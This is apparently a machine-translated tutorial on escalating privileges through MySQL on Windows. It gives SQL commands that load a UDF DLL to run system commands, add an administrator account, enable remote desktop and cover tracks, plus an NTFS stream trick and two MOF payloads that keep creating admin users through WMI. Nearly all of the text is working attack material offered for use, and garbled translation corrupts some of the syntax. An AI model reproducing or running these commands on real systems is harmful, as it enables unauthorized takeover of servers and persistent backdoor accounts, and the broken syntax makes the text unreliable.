1. Using Sqlmap's UDF to extract rights
1. Find a writable directory to upload Lib_mysqludf_sys.dll, according to the version of MySQL to import into the Windows\System32 or MySQL \lib\plugin directory
Select @ @plugin_dir
Select load_flie ('c:\\recycler\\lib_mysqludf_sys.dll'into' c:\\windows\\system32\\lib_mysqludf_sys.dll'
2. Create a function Execution command
Create functionCmdreturnsString soname'Lib_mysqludf_sys.dll';Selectcmd'net user mrxt 123456/add');Selectcmd'net localgroup Administrators Mrxt/add');Selectcmd'regedit/s C:\\3389.reg'); Drop functioncmd;Delete fromMysql.funcwhereName='cmd'
3. In some cases, when encountering the can ' t open shared library, you need to export the DLL to the Lib\plugin directory, and if it does not exist, you can use the NTFS ads stream to create a folder method
Select 'DLL File' intoDumpFile'C:\\Program Files\\mysql\\mysql Server 5.1\\lib\\:: $INDEX _allocation';//create a Lib directorySelect 'DLL File' intoDumpFile'C:\\Program Files\\mysql\\mysql Server 5.1\\lib\\plugin:: $INDEX _allocation';//Create a plugin directory
2.MOF right to lift
Find a writable directory to upload MOF files, such as C:\RECYCLER\
This payload is using Wscript.Shell.
#pragma namespace ("\\\\.\\root\\subscription") instance of__EventFilter as$EventFilter {eventnamespace="Root\\cimv2"; Name="FiltP2"; Query="Select * from__instancemodificationevent ""Wheretargetinstance Isa \ "win32_localtime\ " "" andTargetinstance.second= 5"; QueryLanguage="WQL";}; Instance ofActivescripteventconsumer as$Consumer {Name="ConsPCSV2"; Scriptingengine="JScript"; ScriptText= "varWSH=New ActiveXObject (\ "Wscript.shell\") \nwsh.run (\ "Net.exeUserMrxt123456 /Add\")";}; Instance of__filtertoconsumerbinding{Consumer=$Consumer; Filter=$EventFilter;};
This payload is using User.shell.
#pragma namespace ("\\\\.\\root\\subscription") instance of__EventFilter as$EventFilter {eventnamespace="Root\\cimv2"; Name="FiltP2"; Query="Select * from__instancemodificationevent ""Wheretargetinstance Isa \ "win32_localtime\ " "" andTargetinstance.second= 5"; QueryLanguage="WQL";}; Instance ofActivescripteventconsumer as$Consumer {Name="ConsPCSV2"; Scriptingengine="JScript"; ScriptText="varWSH=New ActiveXObject (\ "Shell.users\") \nz=WSH.Create(\ "Newuser\") \nz.changepassword (\ "123456\ ", \" \ ") \nz.setting (\" Accounttype\ ")=3";}; Instance of__filtertoconsumerbinding{Consumer=$Consumer; Filter=$EventFilter;};
Then export to the c:/windows/system32/wbem/mof/directory
Select load_file ('c:\\wmpub\\nullevt.mof'into'c:\\ Windows\\system32\\wbem\\mof\\nullevt.mof'
This method will continue to add users, execute net stop winmgmt and then delete files to
Reference article:
Http://www.waitalone.cn/mysql-tiquan-summary.html
http://zone.wooyun.org/content/1795
http://www.exploit-db.com/exploits/23083/
MySQL right to mention